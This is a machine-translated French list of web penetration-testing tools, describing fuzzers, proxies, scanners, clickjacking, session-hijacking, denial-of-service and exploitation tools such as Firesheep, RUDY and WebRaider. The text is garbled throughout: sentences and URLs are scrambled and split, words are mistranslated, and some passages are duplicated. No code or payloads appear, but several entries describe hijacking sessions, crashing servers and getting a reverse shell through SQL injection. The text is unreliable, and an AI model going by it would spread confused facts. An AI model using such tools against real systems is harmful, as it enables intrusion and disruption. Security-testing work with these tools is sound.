ClickjackingTool http://www. mais CAT fournit un ensemble riche fonc tionnalité et une plus grande performance.php CEWL (générateur de liste de mots) est une application ruby que les araignées une URL do nnée à une profondeur déterminée.uk/resources/tools/clickjacking-tool/ Clickjacking outil Clickjacking est un premier terme introduit par Jeremiah Grossman et Robert Hans en en 2008 pour décrire une technique par laquelle un attaquant trucs un utilisate ur à effectuer certaines actions sur un site Internet en masquant les éléments cliquab les dans une iframe invisible.contextis. SQL et JavaScript sans les guillemets Il propose une offre intégrée d'Injection SQL et XSS détection Les procurations synchronisée pour l'authentification et la vérification d'autorisat ion Meilleure performance en raison de la mise en cache de connexion HTTP Version SSL et de dames Cipher utilisant OpenSSL Plus de flexibilité pour l'importation de projets / exportation des grumes et des éc onomies Interface à onglets permet d'utiliser plusieurs outils à la fois par exemple répéteurs m ultiples et différents journaux La possibilité de répéter et de modifier une séquence de requêtes (particulièrement utile da ns les essais SSO) C'est gratuit! CEWL http://www.org/projects/cewl. et retourne une l iste de mots qui peuvent ensuite être utilisés pour cracker comme John the Ripper. Conceptuellement. le testeur permettant de se concentre r sur les demandes individuelles. la plupart des sites n' ont toujours pas mis en œuvre une protection efficace contre clickjacking. Base64. leur permettant ainsi d'effectuer un test beau coup plus approfondie. C EWL se prononce "cool". Il ya un certain nombre de différences entre les CAT et les procurations Web actue llement disponibles. elle est semblable à d'autres proxies dis ponibles commercialement et open source. Ils comprennent: CAT utilise le moteur de rendu d'Internet Explorer pour HTML représentation exacte Il supporte de nombreux types de conversions de texte.co. H ex. En part ie. Bien qu'il ait fait deux ans que le concept a été introduit. notamment: URL. Unicode. Ce nouvel outil basé sur un navigateur permet à un utilisateur d'expérimenter avec cli ckjacking techniques en utilisant le point-and-click de choisir visuellement les différents éléments dans une page Web d'être la cible.nts les plus répétitives du processus de test. cela peut être dû à la difficulté de visualiser comment fonctionne la technique dans la pratique.digininja. tel que présenté dans Paul S one Blackhat Europe 2010 parler. L'outil permet également de techni ques clickjacking plusieurs prochaine génération à être utilisé. HTML / XML. combinée à une interface utilisateur plus i ntuitive. Parmi les caractéristiques de ce nouvel outil sont: * Utilisez le point-and-click pour sélectionner les zones d'une page d'être la cible * Prise en charge technique de la nouvelle 'injection champ de texte " * Prise en charge technique de «l'extraction de contenu» de la nouvelle . éventuellement après les liens externes.

* Les chèques DotDotPwn la présence de boot. 3. http://chr1x.txt da ns l'outil téléchargeable.Le serveur vérifie ensuite si un compte corresp ondant à cette information existe et si oui. Port-la numérisation 5. s'il vous plaît consultez le fichier Lisezmoi. Firesheep http://codebutler. CGI et le chemin de balayage.com/ Un outil simple perl qui détecte plusieurs Directory Traversal Vulnerabilities sur les serveurs HTTP / FTP. l'inclusion de fic hiers distants et aveugle d'injection sql sur tous les sites sur le même serveur. 2. Scan pour l'injection sql. 4.github. Darkjumper http://sourceforge. * Actuellement.replay «mode visible» * permettant à un utilisateur de voir comment fonctionne la tech nique derrière la science replay 'mode caché' * permet les mêmes étapes pour être rejoué d'une manière cachée.com/firesheep/ extension pour Firefox qui démontre session HTTP détournement attaques Lorsque vous vous connectez à un site Web vous démarrez généralement en soumettant votre nom d'utilisateur et mot de passe.net/projects/darkjumper/ Darkjumper. IP ou un proxy checker et GeoIP utile pour vérifier votre adresse IP ou votre t ravail proxy ou non. puis de vérifier chaque vulnérabilité de chaque site qui à le même serve ur Fonctions de darkjumper: 1. simulant une attaque clickjacking réel.blogspot. et fonctionne mieux dans Firefox 3 . Pour d e plus amples renseignements. répond de nouveau à vous avec un «cookie» qui est utilisé par votre navigateur pour toutes les demandes ultérieures. DotDotPwn http://dotdotpwn.trouvez colonne auto (mysql) s'il est reconnu bug trouvé mysql 7. Auto-injecteur .py Développé par: mywisdom & gunslinger_ Cet outil va essayer de trouver tous les sites Web qui hébergent sur le même serveur sur votre cible. recensement de l'utilisateur deviner sur la base du procès 4-8 signes prélevés sur chaque nom de site qui les accueillent sur le même serveur.net/toolz/ddpwn/ * Détecte les vulnérabilités traversée de répertoire à distance sur HTTP / systèmes serveur F P. Prise en charge complète pour les autres navigateurs suivront sous peu. Verbocity ajouté 9. il est donc supposé que les systèmes testés so t Basé sur Windows serveurs HTTP / FTP.ini sur les systèmes vulnérables par le biai s des vulnérabilités traversée de répertoires. . L'outil est actuellement à un stade précoce beta. la base de données traversée détient 881 charges utiles attaque. Auto-bruteforcing après l'énumération d'utilisateur 6. Proxy ajouté 8. Utili sez l'option la mise à jour à effectuer une mise à jour en ligne frais. l'inclusion de fichiers locaux.6. Cette version a AttackDB actuellement: 871 charges uti les parcours (et plus!).sectester.

Ctrl + M pour charger vos propres fuzzers partir d'un fichier jbrf. Hamster http://hamster. Il l e fait.3): Plusieurs instances peuvent désormais enregistrer des données dans des répertoires dif férents lancement.wobot. détournement de s ession HTTP (parfois appelé «sidejacking"). c'est quand un attaquant obtient une pri se de cookies d'un utilisateur. Fichi er -> Ouvrir. open source.3. Firesheep est gratuit. Fichier Correction fonctionnalité de recherche lors de l'affichage des réponses fuzzing (thx Markus!) Ajout d'un bouton de swap. mais étonnamment rare pour des sites Web pour crypter to ut le reste. Vitesse-sol http://groundspeed. dans la fenêtre Encoder. et il est temps pour tout le monde à réclamer un Web plus sûr.com/ Hamster est un outil pour la session HTTP avec détournement passive sniffing. Dans un réseau sans fil ouvert. Notes de mise à (2. leur permettant de faire quoi que ce soit l'util isateur peut faire sur un site particulier.erratasec.org/ Vitesse-sol est un open-source extension Firefox pour les testeurs de sécurité des a pplications web présenté à la DC OWASP AppSec 2009. Ils ont fait fi de cette responsabilité depuis trop longtemps. les co okies sont essentiellement crié dans l'air. Son but est de fournir une seule application portable qui offre protocole web stable fuzzing capacités. en reniflant sur un réseau. plus amis Encoder / Hash est maintenant aussi un pot standalone / exe Ajouté clic droit encoder / décoder fonctionnalité dans l'onglet Fuzzer . de capturer les cookies de session. faisant de ces attaques extrêmement faci le.Demande de t exte du panneau Ajout d'un standalone jbrofuzz-core-2.Suppression de l'ajout de sauts de ligne par défaut à la fin de chaque requête. JBroFuzz http://sourceforge. en vertu: Préférences -> Annuaire Sites Gardez Histoire de dir précédente: Fichier -> Enregistrer sous -> Enregistrer. et est désormais disponible pour Mac OS X et W indows. assu rez-vous de savoir ce que vous fuzzing! .net/projects/jbrofuzz/files/ JBroFuzz est un fuzzer application web pour les demandes faites via HTTP et / ou H TTPS.Elle est très fréquente pour les sites à protéger votre mot de passe par le chiffrement de la connexion initiale. de les imp orter dans le navigateur pour vous permettre de détourner leur session! session HT TP détournement ou SideJacking est l'endroit où vous détourner une session Web existan t avec un service distant en interceptant et en utilisant les informations d'ide ntification (normalement cookies de session) qui a identifié à l'utilisateur de ce s erveur spécifique. Il vous permet de manipuler l'inte rface utilisateur de l'application Web pour éliminer les limitations gênantes et con trôles côté client qui interfèrent avec le test de pénétration des applications web. le support de Linux est sur le chemin.1): . Mon espoir est que Firesheep aide ra les utilisateurs de Windows. . Cela laisse le cookie (et l'utilisateur) vulnérables. Des sites Web ont la responsabilité de protéger les personnes qui dépendent de leurs s ervices.jar bibliothèque de fuzzing API Notes de version (2.

Graphing * L'onglet graphique est responsable pour la représentation graphique (dans une va riété de formes). LFImap http://code. voir toutes les erreurs qui pourraient se produire et aussi suivre le fonctionnement en termes d'événements étant connecté. Système * L'onglet système représente l'exploitation de la console de JBroFuzz à l'exécution. .JBroFuzz enregistre désormais dans le journal quotidien (thnx Ranulf!) . Manipuler * L'onglet charges utiles est une collection de fuzzers avec leurs charges corre spondant qui peut être utilisé pendant fuzzing. une vision plus claire de ce que les charges utiles sont disponibles.Ajout de 3 nouvelles fuzzers extension de fichier (thnx Adam) Les composants de JBroFuzz sont tous intégrés dans une seule fenêtre et peut être consulté ar les différents onglets. les réponses reçues pendant fuzzing. . En-têtes * L'onglet têtes est une collection de têtes navigateur qui peut être utilisé pendant fu zzing. En-têtes * L'onglet en-têtes est une collection de têtes navigateur qui peut être utilisé pendant fuzzing. Ici. la façon dont ils sont regroupés et quelles sont les propriétés de cha que fuzzer a peut être vu dans cet onglet.On The Wire: option clic droit. En fonction de la charge utile fuzzer sélec tionné. Cet onglet est fourni. Les charges utiles sont ajoutés à la dem ande dans l'onglet fuzzing. responsable de toutes les opérations de fuzzing réalisée sur le réseau.Base32 et zBase32 Encode / Decode fonctionnalité ajoutée . clair et aussi de choisir de voir les demandes et / ou des réponses . Cet onglet peut offrir une indica tion claire d'une réponse qui est différente du reste reçu.Vous pouvez charger vos charges personnalisé en plaçant un fichier nommé fuzzers. il met sur le fil et écrit la réponse à un fichier. En-têtes sont obtenus à partir de différents navigateurs sur les différentes plat es-formes et systèmes d'exploitation.jbr f dans votre répertoire de travail.. Ces onglets sont les suivants: Fuzzing * L'onglet fuzzing est l'onglet principal de JBroFuzz.google. En-têtes sont obtenus à partir de différents navigateurs sur les différentes p lates-formes et systèmes d'exploitation. vous pouvez accéder à des informations d'exécution Java. il crée les données malformées pour chaque demande. comme beaucoup d'a pplications web répondent différemment aux différentes attaques d'emprunt d'identité nav igateur.Ajout d'ASCII 85 (045-A85-RFC) et imprimables ASCII 94 (046-A94-CHR) fuzzers. une indication de l'examen complémentaire.com/p/lfimap/ Ce script est utilisé pour prendre le plus beneficts du fichier local comprennent la vulnérabilité dans le serveur web .

owasp. SAHI . etc Il peut être exécuté en mode natif sur Linux.com/p/r-u-dead-yet/ RU-Dead-Pourtant. professionnels de la sécu rité. flexible. lecteurs fl ash. Mantra est absolument gratuit et ne prend pas de temps pour vous de mettre en place.pdf Cet outil fonctionne avec un menu interactif de la console. l'accès. l'escalade de privilèges. Il s'agit d'une collection d'outils libres et open source intégré à un navigateur web. les développeurs d'applications web. prêt-à-l'emploi. compact et suit le véritable esprit des logi ciels libres et open source.html Mantra est un rêve devenu réalité. unique de détection Netsparker et techniques d'exploitation lui permet d'être morts précises dans les rapports où il est le premier et le seul faux positif web gratuit de l'application de balayage de sécurité R U Dead Yet http://code.google. l'outil propose d'exécution sans assistance en fournissant les paramètres nécessaires dans un fichier de configuration. Windows et Mac. qui se concentre uniquement sur les attaq ues LFI. et brouiller les pistes. et permettant à l'utilisateur de choisir les formulai res et les champs de formulaire sont souhaitables à utiliser pour l'attaque POST.Un nouvel outil simple a été récemment publié.org/images/4/43/Layer_7_DDOS. les testeurs de pénétration.com/ Netsparker ® peut détecter et de signaler les problèmes de sécurité tels que l'injection SQ et Cross-Site Scripting (XSS) dans toutes les applications web indépendamment de la plate-forme et de la technologie dont ils sont construits. En outre. La théorie de l'attaque est décrit dans l'article suivant: http://www.com/index. CD / DVD. met en œuvre les génériques HTTP DoS attaque via long observations champ de formulaire. dont la reconnaissance. Netsparker http://www. qui peut devenir très pratique pour les étudiants. En dehors de cela il contient également un ensemble d'outil s pour les développeurs Web et les débogueurs de code qui rend très pratique à la fois p our la sécurité offensive et défensive des tâches de sécurité connexes. de numér isation et de recensement. détection automatique de formes dans les URL donnée. Fonctions * * * * * * Automatiquement trouver la racine du système de fichiers Les fichiers par défaut de détection en dehors du dossier web Les tentatives visant à détecter les mots de passe dans les fichiers Prend en charge l'authentification de base Peut utiliser octet nul de contourner certains contrôles Rédiger un rapport de l'analyse d'un fichier Mantra http://www. etc Il est portatif.mavitunasecurity. à court ou RUDY. Vous pouvez le garder dans les cartes mémoire.getmantra. Mantra est un cadre de sécurité qui peut être très utile da ns l'exercice de tous les cinq phases d'attaques. portable et facile à utiliser avec une interface utilis ateur graphique agréable. Il pe ut également être installé sur votre système en quelques minutes. Mantra est lite. de maintenir l'accès.

une excellente interaction Java et a u reporting intégré. plate-forme et l'indépendance navigateur. Il résumés en plus de difficultés que les testeur s face tout en automatisant les applications web.com yahoo. * Possibilité d'invoquer n'importe quelle bibliothèque Java à partir de scripts Limitations Jeux de cadres * / pages avec frames / iframes chargement des pages de plusieurs domaines n'est pas pris en charge. HTTPS. aucun e période d'attente. vous ne pouvez pas avoir une page de google. la lecture multi-thread.com. 401 & NTLM authentification popups navigateur * Prise en charge et de boîtes de dialogue modales * Prise en charge d'AJAX et des applications web très dynamique * Scripts très robuste * Fonctionne sur des applications avec des identifiants aléatoires auto-générés * Très léger et extensible * Prise en charge des tests pilotés par les données.co. multi-processus d'analyse des technolo gies de la langue incroyablement rapide LUA pour effectuer à distance scans sécurité d es applications web. les technologies traditionnelles de Web. qui travaill era en Sahi. Téléchargement de fichiers lui-même fonctionne bien SandCat http://www. XPaths. Donc.com.com/?n=Sandcat. Peut se connecter à la base de do nnées.http://sahi. les nouvelles technologies Web 2. Certains traits saillants incl uent un excellent graveur. nous a permis de livrer exactement ce que nous avons cherché à fournir . Sahi inject e javascript dans les pages web en utilisant un proxy et le javascript permet d' automatiser les applications Web. navigateur Web HTML 5-courant.à l'application web plus riche en fonctionnalités et avancées sc anner de sécurité disponibles à ce jour.com ayant une iframe sur une page de yahoo. Notez que ce n'est pas la même que la commutation entre des domaines. Téléchargez-le et regardez pa r vous-même! . SandCat combine Syhunt de l'état de l'art-. Sahi est un outil convivial testeur.syhunt.in/w/ Sahi est un outil d'automatisation pour tester les applications web. et les langages de programmation Web tels que PHP. SandCat émule un moderne. * Téléchargement de fichiers champ ne sera pas peuplée sur les navigateurs pour la vérif ication javascript. où vous naviguez d'une page à une page google. Bien que spidering une vulnérabilité site web et de la chasse.Sandcat Notre connaissance approfondie des questions de sécurité. Caractéristiques * * * * * * * * * * Le navigateur et système d'exploitation indépendant Enregistreur puissant qui fonctionne sur les navigateurs Spy objet puissant API simple et intuitive Javascript basé scripts pour le contrôle de la bonne programmation Version contrôlables scripts basé sur du texte Dans les rapports de construction Dans la lecture de construction multi-thread ou en parallèle des tests Tests n'avez pas besoin de la fenêtre du navigateur pour être en bref Commande en ligne et la fourmi de soutien pour l'intégration dans l'élaboration de processus * Prise en charge proxy externe.0 comme AJAX. Sahi ne peut pas gérer les pages qui ont d'aut res pages de différents domaines noyés dans la masse en utilisant les iframes ou cad res. fichier Excel ou CSV.

Delay Time * pour l'injection de la recherche. Auto * Obtenez Cookie à partir du navigateur Web pour l'authentification. Il cherche des questions liées à mashups. des biscuits. Unicode. * Vulnerability Scanner (Injection SQL. injection XPath. qui cible actuelleme nt des services Web.owasp. WackoPicko https: / / github. injection XPath.com/ Watcher est un outil d'exécution passive-analyse pour HTTP applications Web. et plus WebCruiser http://sec4app. Watcher fournit pen-testers h ot-spot de détection de vulnérabilités. * GET / Post / Cookie injection. et un Cross Site Scripting outil! Fonction: * Sur chenilles (annuaires de sites et fichiers). * POC (Proof of Concept): Injection SQL. Cross Site Scripting.Web Vulnerability Scanner. la divulgatio n d'informations. . et d'automatiser.codeplex. WebCruiser est également un outil d'injection SQL automatique. etc. . Watcher détecte les problèmes de sécurité des applications Web ai nsi que les problèmes de configuration opérationnelle. il est com plètement sûr pour employer dans le calcul de Cloud. Cet outil a été créé sur la base.WSFuzzer http://www.Lire la suite Observateur http://websecuritytool. Flash. SSL fuites referrer. Cross Site Scripting. écrit en Python. Oracle *: Union / Blind / Injection CrossSite. * Recherche d'entrée de l'administration. Cet outil n'est pas destiné à être un remplacement pour une analyse manuelle solides de l'homme. des en-têtes HTTP. * Rapport de sortie. etc Donc. Cross Site Scripting. MySQL/DB2/Access *: Union / Injection aveugles. et l 'audit vérificateurs de la conformité PCI. * SQL Server: PlainText / Union / Injection aveugles. un outil web compact mais puissant de ba layage de sécurité qui vous aide dans l'audit de votre site! Il a un scanner de vulnér abilité et d'une série d'outils de sécurité. des comme ntaires. injection XPath . hébergement dédié et des environnements. des charges utiles contrôlé par l'utilisateur (XSS potentiels). de certai ns manuels du monde réel SOAP stylo travail d'essai. un outi l d'injection XPath. Services Web ne sont pas négligeables dans la natur e afin expertise dans ce domaine est un must pour les essais stylo approprié. Être pa ssive signifie qu'il ne sera pas endommager les systèmes de production. Données Post * Renvoyer. e tc).com/ WebCruiser .org/index. Dans la version actuelle HTTP en fonction des services SOAP sont la cible principale. Il peut prendre en charge le site de numérisation ainsi que POC (prooving of conce pt) de vulnérabilités web: les injections SQL.com / adamdoupe / WackoPicko WackoPicko est une application web vulnérable utilisé pour tester des applications w eb scanners de vulnérabilité. les développeurs de tests de validité rapide. S'il vous plaît cons ulter WSFuzzer comme un outil pour augmenter l'analyse effectuée par des professio nnels compétents et bien informés. Silverlight.php/Category:OWASP_WSFuzzer_Project WSFuzzer est un programme sous licence LGPL. hébergement mutualisé.

WebScarab est capable d'intercepter les communications HTTP et HTTPS. et est donc portable sur de no mbreuses plateformes. WebScarab est un cadre d'analyse des applications qui communiquent en utilisant les protocoles HTTP et HTTPS. avec un accent particulier sur la prise de l'application plus conviviale. y compris les navigateurs modernes avec l'appui de HTML5.google. WebScar ab fonctionne comme un proxy d'interception.scrt.google.net/ XSSer est un outil open source tests de pénétration qui automatise le processus de dét ection et d'exploitation injections XSS contre les différentes applications.sourceforge. xpcshell.com / p / WebScarab-ng / http://www. WebSecurity http://code. plus stable plateforme de test * Le développement d'extensions Amélioration de l'API * Moins de faux positifs * Des gains importants tests de performance * Prise de captures d'écran automatique vulnérabilité * Intégration avec le Réseau Websecurify * Amélioration des stratégies de fuzzing * Perspectives d'espace de travail * L'application intégrée et l'extension mises à jour automatiques XSSer http://xsser. mis en œuvre par un certain nombre de plugins. Jav a. . »Est un site Web et Websecurify web2.ch/pages_en/xssploit.com/p/websecurify/ Websecurify Security Testing cadre identifie les failles de sécurité Web par l'utili sation du navigateur d'automatisation.org/index.php/OWASP_WebScarab_NG_Project WebScarab-NG est une réécriture complète de l'ancienne application WebScarab. la découverte et fuzzing technologies. Dans son utilisation la plus courante.WebScarab NG https: / / code. xulrunner. e t d'examiner et de modifier les réponses renvoyées par le serveur avant qu'ils soien t reçus par le navigateur .html XSSploit est un multi-plate-forme de type Cross-Site Scripting scanner et exploi teur écrit en Python.owasp. WebScarab a plusieurs modes de fonctionnement. Le c adre est écrit en JavaScript et exécute avec succès dans de nombreuses plateformes. et de diverses techniques spéciales d'injection de code. Il est écrit en Java. V8 et d'autres. Il contient plusieurs options pour essayer de contourner certains filtres. permettant à l'opérateur d'examiner et de modifier les demandes créées par le navigateur avant de les envoyer au serveur." Cette version contient les améliorations suivantes: des améliorations d'interface utilisateur * * Plus rapide.0 initiative de sécurité spécialisée dans les recherc hes sur des questions de sécurité et de la construction de la prochaine génération d'out ils à la défaite et de protéger les technologies du web. L'opérateur peut également examiner les conversations (demandes et répo nses) qui ont traversé WebScarab. Il a été développé pour aider à la découverte et l'exploitation des vul abilités XSS dans les missions de tests de pénétration. XSSploit http://www.

Fiddler vous permet d'inspecter tous les HTTP (S) de la circulation. puis (év entuellement) le téléchargement de fichiers qui permettent l'exécution de commandes ou d'autres actions directement sur la cible.py: Le fichier principal.py: L'interface utilisateur graphique. Il analyse ensuite ces formes de détecter automatiqu ement les vulnérabilités existantes XSS ainsi que leurs principales caractéristiques. Cette fonctionnalité extensible permet de choisir le comportement souhaité exploiter et génère automatiquement le lien correspondant HTML i ntégrant l'exploit de charge utile. et "violon" avec les données en .Extensions. Les vulnérabilités ont été découvertes peuvent ensuite être exploitée en utilisant l'exploit oteur de génération de XSSploit. DAVtest prend en charge: * * * * * * Envoi automatique d'exploiter les fichiers Randomisation automatique du répertoire pour aider à cacher des fichiers Envoyez des fichiers texte et essayer de MOVE pour nom de l'exécutable De base et l'autorisation Digest Nettoyage automatique des fichiers téléchargés Envoyer un fichier arbitraire violoneux http://www. il suffit d'ajoute r une nouvelle ligne dans ce fichier et écrivez votre extension.fiddler2.Xssploit. DAVtest http://code. .google.com/fiddler2/ Fiddler est un proxy Web Débogage qui enregistre toutes les HTTP (S) le trafic ent re votre ordinateur et l'Internet.xsl: Cette feuille de style est un exemple très basique sur la façon d'affi cher le rapport généré par XSSploit.Gui.txt: araignée de XSSploit explore les pages Web en utilisant les expr essions rationnelles.Exploits. Il est destiné aux testeurs de pénétration de déterminer rapidement et facilement si elle est activée services DAV sont exploi tables.com/cross-site-scripting/scanner. les points d'arrêt ensemble.htm Acunetix Web Vulnerability Scanner (WVS) est une application web automatisée des t ests de sécurité outil que les applications Web de votre audits en vérifiant les vulnéra bilités exploitables piratage. Placez ce fichier dans le même dossier que le rappo rt XML et pointez votre navigateur sur le fichier de rapport pour voir le rappor t. XSSploit rampe premier tout le site et id entifie les formes rencontrées. Pour ajouter une nouvelle extension. Acunetix http://www.xml: La base de données exploits.acunetix. Ne pas oublier le point. Ce fichier contient les extensions de fichier sur le serve ur qui doit être spidered. . S'il vous plaît se référer à ce fichier pour créer de nouveaux exploits.com/p/davtest/ DAVtest tests WebDAV serveurs en téléchargeant les fichiers de test exécutable. Contient le noyau XSSploit et l'interface d e ligne de commande. XSSploit est livré avec plusieurs fichiers: . . . scans automatisés peuvent être complétées et vérifiées par rec upement avec la variété d'outils manuels pour permettre site Web complet et les test s de pénétration des applications web.Report.Quand il est utilisé contre un site Web.

Il est actuellement en cours de développem ent mais il est utilisable.google. fuzzdb http://code. Mozilla Firefox. articles. NET.com/p/fuzzdb/ fuzzdb est un ensemble complet de séquences connues modèle d'attaque. fuzzdb est une base de do nnées des modèles d'attaque connue pour avoir causé exploiter des conditions dans le p assé. y compris Internet Explorer. et les messages d'erreur pour le test force intelligente brute et l'id entification condition d'exploiter des applications web. FIMAP devrait être quelque chose comme sqlmap seulement pour les bug s LFI / RFI au lieu de l'injection SQL. Le but de FIMAP est d'améliorer la qualité et la sécurité de votre site web.trant ou sortant. Il est inspiré du mangleme autre outil similair e pour trouver des problèmes de sécurité et de fiabilité dans les navigateurs web. blogs. En raison de la popularité d'un petit nombre de types de serveur.com/p/fimap/ FIMAP est un outil peu python qui peuvent trouver. . fuzzdb contient des listes de messages d'erreur à l'encontre motif correspondant de sortie du serveur afin de faciliter la détection des défauts logiciels de sécurité. et l'application. iExploder http://code. sans le scanner. mailing liste fils * modèles glanés dans d'autres fuzzers open source et des outils pentest * analyse des app installe par défaut * Système de documentation de l'application et messages d'erreur * C'est comme un scanner non-automatisé. Depuis les erreurs du système contiennent des chaînes prévisible. d'exploiter et même Google automatiquement pour locaux et distants bugs inclusion de fichiers dans webapps. classées par type d'attaque. FIMAP http://http://code. préparer.com/p/iexploder/ Si vous aimez fuzz-force de votre chemin dans trouver des vulnérabilités. Opera. et be aucoup plus. des endroits p révisibles. les chance s sont que vous aimerez iExploder. Les sources primaires utilisées pour la recherche modèle d'attaque: * La recherche de vieux exploits sur Internet pour les chaînes attaque répétable * modèles de scanner raclage http journaux * Divers livres. Fiddler comprend un sous-système de script puissant basé sur les événe ments. Une base de données complète de ceux-ci. De nombreux mécanismes d'attaque utilisés pour exploiter les différentes plates-formes de serveur web et applications sont déclenchées par des méta-caractères particuliers qu i sont observées dans plus d'un avis de sécurité du produit. des ressources telles que les fichiers journaux et des répertoires administratifs sont généralement situés dans un petit nombre d'endroits prévisibles. triés par type de plateforme. fait fuzz force brute de tester une approche de type scalpel. d'audit. et peut être étendu en utilisant n'importe quel langage.google. les plates-forme s et des formats de paquets. la plate-forme.google. Fiddler est un freeware et peut déboguer le trafic à partir de pratiquement n'import e quelle application.

tiff. ainsi que trouver de l'information backtrace mitmproxy http://mitmproxy. Pensez tcpdump pour HTTP. Pinata est un script python qui va générer Proof of Concept CSRF HTML à partir de la requête HTTP. interceptant proxy HTTP.com/p/pinata-csrf-tool/ Pinata est un script python qui va générer Proof of Concept CSRF HTML à partir de la r equête HTTP.org/ est une mitmproxy SSL-capable. Il a été conçu pour fonctionner p endant des heures. JNG. snd . avec les mêmes fonctionnal ités. afin de test er sa stabilité et sa sécurité. png. est un type de "malveillants exploi tent d'un site Web où des commandes non autorisées sont transmises par un utilisateu r que le site Web de fiducies . iExploder est disponible sous forme d'un harnais navigateur complet. Cela peut inclure les données de session en contournant les mécanismes de protection pou r Cross-Site Request Forgery. le serveur web autonome ou d'un script CGI.com/misc/monkeyfist/ MonkeyFist est un outil qui crée des faux demande dynamique basée sur des données inte r-domaines de fuite. Caractéristiques * * * * * Intercepter et de modifier le trafic HTTP à la volée Sauvegarder les conversations HTTP pour les rejouer plus tard et l'analyse Replay fois clients et serveurs HTTP Apporter des modifications de script pour le trafic HTTP en utilisant Python Interception SSL certs généré à la volée monkeyfist http://hexsec. gif. ico. XPM) * Très manipulation du DOM de base fuzzing via JS * En-tête HTTP fuzzing * CSS Selector fuzzing * Logic. jpg.google. wav. svg. L'outil construit alors une charge utile sur la base de don nées dans le fichier payloads.Il se nourrit le navigateur à l'étude avec un mauvais code HTML et CSS. . mais sans fioritures. avec la possibilité de reprendre (uniquem ent séquentiel) * Outils pour aider à isoler le test s'est écrasé le navigateur. Quelques-unes de ses caractéristiques sont les suivantes: * Tests tous les attributs HTML et CSS que Mozilla. voire plusieurs jours jusqu'à ce que le plantage du navigateur. Il se nourrit en permanence les navigateurs de mauvais es données dans l'espoir qu'ils finiront par accident. faux Cross-Site Request. Webkit et d'autres navigateu rs prennent en charge * Basic fuzzing pour les formats de médias (bmp.xml et l'envoie au navigateur de l'utilisateur. mitmdump est la version en ligne de commande mitmproxy. et les essais de chaîne de format * Un nombre illimité de tests reproductibles * Essais testcase séquentielle et aléatoire. également connu comme une attaque en un seul clic ou à chev al session et en abrégé CSRF (mer-surf) ou XSRF. pinata http://code. ogg. dépassement de mémoire tampon. XBM. Il fournit une interface de console qui permet les flux de circulation doivent être inspectés et édité à la volée.

semblable à WebScarab.net/apps/mediawiki/watobo/index. WATOBO n'a pas de capacités d'attaque et est fournie à des fins juridiques audit de vulnérabilité seulement.Vue d'ensemble: .L'EEG CSRF HTML comprend IMG SRC tag avec pour valeur l'URL à l'essai. . contrôles Active au lieu produira un nombre élevé de demandes (selon le module de cont rôle) parce qu'ils ne la partie automatique de l'identification de la vulnérabilité. par exemple. WATOBO n'a pas de capacités d'attaque et est fournie à des fins juridiques audit de vulnérabilité que WATOBO fonctionne comme un proxy local. WATOBO fonctionne comme un proxy local. p ar exemple lors d'une analyse. par exemple. En outre. Nous sommes convain cus que l'approche semi-automatique est le meilleur moyen d'effectuer un audit p récis et d'identifier la plupart des vulnérabilités. semblable à WebScarab. En outre. contrôles Active au lieu produira un nombre élevé de demandes (selon le module de cont rôle) parce qu'ils ne la partie automatique de l'identification de la vulnérabilité.L'outil va alors créer un fichier HTML correspondant au type de la demande.net/ w3af est une application Web Attack et Cadre de vérification. Les contrôles passifs ser ont effectués pendant les activités de navigation normale. Les contrôles passifs ser ont effectués pendant les activités de navigation normale. L'objectif du projet est de créer un cadre pour trouver et exploiter les vulnérabilités des applications W eb qui est facile à utiliser et à étendre. Aucune des demandes supplém entaires sont envoyées à l'application (web). Paros ou BurpSuite. Ils sont utilisés pour recueillir des info rmations utiles.L'outil va générer une preuve de concept CSRF HTML donné une requête HTTP. Il vérifie au tomatiquement s'il s'agit d'un EEG ou une requête POST et avec une validation supp lémentaire de la norme et POST "multipart / form POST. Les contrôles passifs son t plus comme des fonctions de filtrage.sourceforge. p . Les contrôles passifs son t plus comme des fonctions de filtrage. Aucune des demandes supplém entaires sont envoyées à l'application (web). e-mail ou des adresses IP. w3af http://w3af.sourceforge. watobo http://sourceforge. Ils sont utilisés pour recueillir des info rmations utiles. . WATOBO soutient les contrôles passifs et actifs. WATOBO soutient les contrôles passifs et actifs. Nous sommes convain cus que l'approche semi-automatique est le meilleur moyen d'effectuer un audit p récis et d'identifier la plupart des vulnérabilités.Le POST CSRF HTML est créée avec auto présenter sous forme de script java avec les n oms et les valeurs de la requête HTTP. e-mail ou des adresses IP. Paros ou BurpSuite. watobo http://watobo.net/ WATOBO est destiné à permettre aux professionnels de la sécurité d'effectuer très efficace (semi-automatique) des audits de sécurité des applications Web. .php?title=Main_Page WATOBO est destiné à permettre aux professionnels de la sécurité d'effectuer très efficace (semi-automatique) des audits de sécurité des applications Web.

* Elle est courte. vous n'avez pas besoin d'un outil. Eventuellement.exe. TFTP ou debug.ar exemple lors d'une analyse. généralement pas plus de 3. * Facile à automatiser. Il peut être utilisé pour tester différents composants du système qui ont de s interfaces HTTP (JSP. webinject http://www. et peut être utilisé comme un harnais de test pour créer une suite de [HTTP niveau] fonctionnels automatisés. * C'est une seule demande donc plus rapide.com/ X5 est un addon Fiddler qui vise à aider les testeurs de pénétration dans la recherche cross-site scripting vulnérabilités. * Il suffit de copier coller de la charge utile. * Simple.codeplex. ASP. il peut être utilisé comme un lanc eur de test autonome (text / application console) qui peut être intégré et appelée à parti r de cadres d'autres tests ou des applications. Vous pouvez changer les chemins et le fair e fonctionner avec la dernière Metasploit de votre propre installation. WebInject peut être utilisé comme un cadre de test complet qui est contrôlée par l'inter face WebInject utilisateur (GUI). Par auto-injection caractère spécia l-sondes dans tous les X5 entrées permet de détecter lorsque le caractère émis peut être m .org/ WebInject est un outil gratuit pour les tests automatisés d'applications Web et se rvices Web. CGI. les formulaires HTML. etc). XML / SOAP Web Services. FTP pour transfér er la charge initiale.webinject. * Il n'est pas fixe. webraider http://code. REST. * Ne nécessite pas de demande sur le système cible. vous pouvez le faire manuellement à l 'aide de votre navigateur ou une simple approximation MITM. PHP. comme FTP. Idée de cette attaque est très simple. A noter également en raison de l'obus inverse et composants Metasploit ce logiciel sera détecté un virus par le logiciel AV X5 http://xss. WebInject offre en temps réel l'affich age des résultats et peut également être utilisé pour surveiller les temps de réponse du s ystème. Il est possible de concevoir un lien et de réaliser une attaque de type CSRF qui vous donnera une coque arrière. et des te sts de régression. vous pouvez modifier la charge utile. Servlets. AJAX. Obtenir un shell inverse d'une injection SQL avec une demande sans l'aide d'un canal supplémentaire comme TFTP. Un atelier de test vous permet d'exécuter de nombreux cas de test et de recueillir / rapport de vos résultats.google. d'acceptation. Dépendances En interne WebRaider utilise Metasploit.com/p/webraider/ WebRaider est un plugin basé outil automatisé d'exploitation des applications web 